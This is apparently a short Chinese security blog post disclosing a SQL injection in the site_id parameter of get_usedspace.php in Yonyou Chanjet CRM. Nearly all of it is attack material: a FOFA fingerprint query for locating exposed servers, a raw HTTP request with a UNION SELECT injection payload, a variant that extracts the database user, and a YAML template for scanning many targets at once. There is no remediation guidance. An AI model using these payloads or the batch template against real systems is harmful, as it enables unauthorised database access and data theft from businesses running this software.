用友畅捷通 畅捷CRM get_usedspace.php SQL注入漏洞

漏洞简介

畅捷CRM get_userspace.php文件中 site_id参数存在SQL注入漏洞

漏洞复现

fofa语法:icon_hash="-1068428644"
登录页面如下:

POC:

GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close



/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20user()--

批量yaml文件

id: changjieCRM_get_usedspace_sqli
info:
  name: 用友畅捷通 畅捷CRM get_usedspace.php SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: word
        part: body
        words:
          - qxvvqVdrnGjczVZPaMLCWEDjPaGVPmHmXTKNdmzWqphQeqqbkq
posted @ 2023-10-19 22:15  学安全的小白  阅读(239)  评论(0编辑  收藏  举报